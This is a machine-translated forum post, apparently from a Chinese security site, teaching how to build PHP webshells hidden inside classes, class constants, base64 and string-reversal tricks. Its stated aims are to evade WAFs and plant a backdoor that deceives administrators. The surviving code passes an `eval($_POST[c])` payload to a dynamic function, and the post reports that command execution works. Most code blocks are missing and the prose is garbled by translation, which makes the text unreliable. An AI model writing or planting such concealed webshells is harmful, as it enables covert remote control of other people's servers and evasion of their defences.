share your technology and add some temperature for safety

Posted by trammel at 2020-04-14

Essences webshell study in PHP direction. Don't miss it.

The author of this paper is laimoc (formerly xoanhn), and his website is

This article belongs to the original reward plan of spring and autumn, and is not allowed to be reproduced without permission

Previous posts:

It was intended to write a comprehensive PHP script file (modify file content, copy file, delete file, create file, directory traversal, etc.; execute system command; upload file; encrypt / decrypt or encode / decode file content; add / delete / modify database; hijack login form, etc.). It takes a lot of time to debug. Besides, there are some modules on the split and disassembly network, so that's it.

This published article mainly focuses on: class encapsulation, constructor, Perl class constant use, encoding and decoding, etc., to combine with the general to make webshell.

The most basic webshell is:

[Applescript] plain text view copy code

Or the shortest

So the original intention of my research: 1. Because the shortest sentence will be directly intercepted by many WAFS, etc. 2. I want to leave a back door that is relatively hidden and easy to cheat the administrator 3. I want to exercise my PHP mastery and use ability 4. In order to supervise the security programming idea for our development team.

The most basic class:

[Applescript] plain text view copy code

In depth, it is as follows:

[Applescript] plain text view copy code

Well, that's right. It's a very common class.

Look at Perl class:

[Applescript] plain text view copy code

This is the case above,:: operator to access the Perl clas constant. Let's debug Perl class:

Magic bar, I think so, PHP really makes me happy Ilove her!

Now let's use perlclass to make a webshell:

[Applescript] plain text view copy code

Const PI this is our Perl class constant, which is declared in class, and then constant reference is made by the:: operator out of class. So let's change the PI to Base64 "decode first. Do you think it will be implemented? Will it be because it's a string and then an error? Don't be afraid. Let's go and have a look. We have universal echo:

Try to use it. In fact, learn from it without restraint. My guide gives great encouragement and is my model:

When using this encoding, I think that I can also use URL encoding, rot13 encoding, inversion, string splicing, string splitting and utilization (such as expand), string search and replacement (such as substr), quoted printable string conversion and utilization, etc. for more information, please refer to: Http:// is as follows, a sentence for debugging:

Let's explain that the encapsulation of class can make a sentence:

First, a finished product is shown as follows. Click me to display the source code:

Sorry, if you click again, the source code will not be displayed.

We mentioned the prototype of the class, let's try:

[Applescript] plain text view copy code

Our external class calls the dynamic creation function internally to pave the way for the next step of webshell, and then we can instantiate it:

$a = new a();

This is instantiation. To be brief, remember to instantiate with new. Let's refer to it below. We defined a create fun in the class. We can use it here, as follows,

$a ->create_fun($shell);

So here, is there still something missing? I can see the parameters. Let's simply define the parameters: in a word, ha ha, simple violence.

$shell ="eval($_POST[c]);";

Now the sorting is finished. The encapsulation of the class implements one sentence. Let's test it:

It is possible to execute commands. That's it.

You can see that our phpinfo () is also OK.

Finally, let's talk about how to combine constructors to generate a sentence. In fact, if we are good at debugging, our research should be over here.

But in order to say a few more words, I'll stay here. First, I'll show you how to reverse strings, which makes me feel like a magic horse in PHP:

[Applescript] plain text view copy code

This section of code is enough to implement. Hahaha, actually, it can also be a short one word thing: strrev, this function is powerful and can associate itself.

How to use this inversion function? In a word: slowly, use more, the experience taught by the big guys. It is better to give fish than to give fish. When you grow up and succeed, you can share a bowl of soup with us.

OK, let's not pull it. It's a pain in the cervical spine. We should exercise regularly.

The picture below, I can guarantee, will surprise and excite you!

This is the end of the last study on PHP's Web shell. Ready to learn C language.

I will pack all the accessories and not hide them any more. My cousins and cousins will reply, thank you very much.